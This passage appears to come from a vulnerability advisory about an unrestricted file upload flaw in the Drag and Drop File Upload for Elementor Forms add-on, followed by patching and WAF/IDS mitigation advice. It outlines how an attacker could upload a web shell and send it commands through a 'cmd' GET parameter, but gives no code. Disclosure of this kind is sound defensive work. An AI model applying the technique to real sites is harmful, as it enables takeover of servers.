This flaw allows an attacker to <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-53251-unrestricted-file-upload-vulnerability-in-an-themes-pin-wp\/\"  data-wpil-monitor-id=\"81371\">upload files<\/a> of any type, including scripts that can run commands on the server, such as a web shell. The attacker can then access this script and pass commands through the &#8216;cmd&#8217; GET parameter.<\/p>\n<p><strong>Mitigation<\/strong><\/p>\n<p>Users of the Drag and Drop <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-8141-unauthenticated-arbitrary-file-deletion-vulnerability-in-redirection-for-contact-form-7-wordpress-plugin\/\"  data-wpil-monitor-id=\"81380\">File Upload for Elementor Forms<\/a> add-on are advised to apply the vendor patch as soon as possible. If a patch is not available or cannot be applied immediately, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as a temporary mitigation.
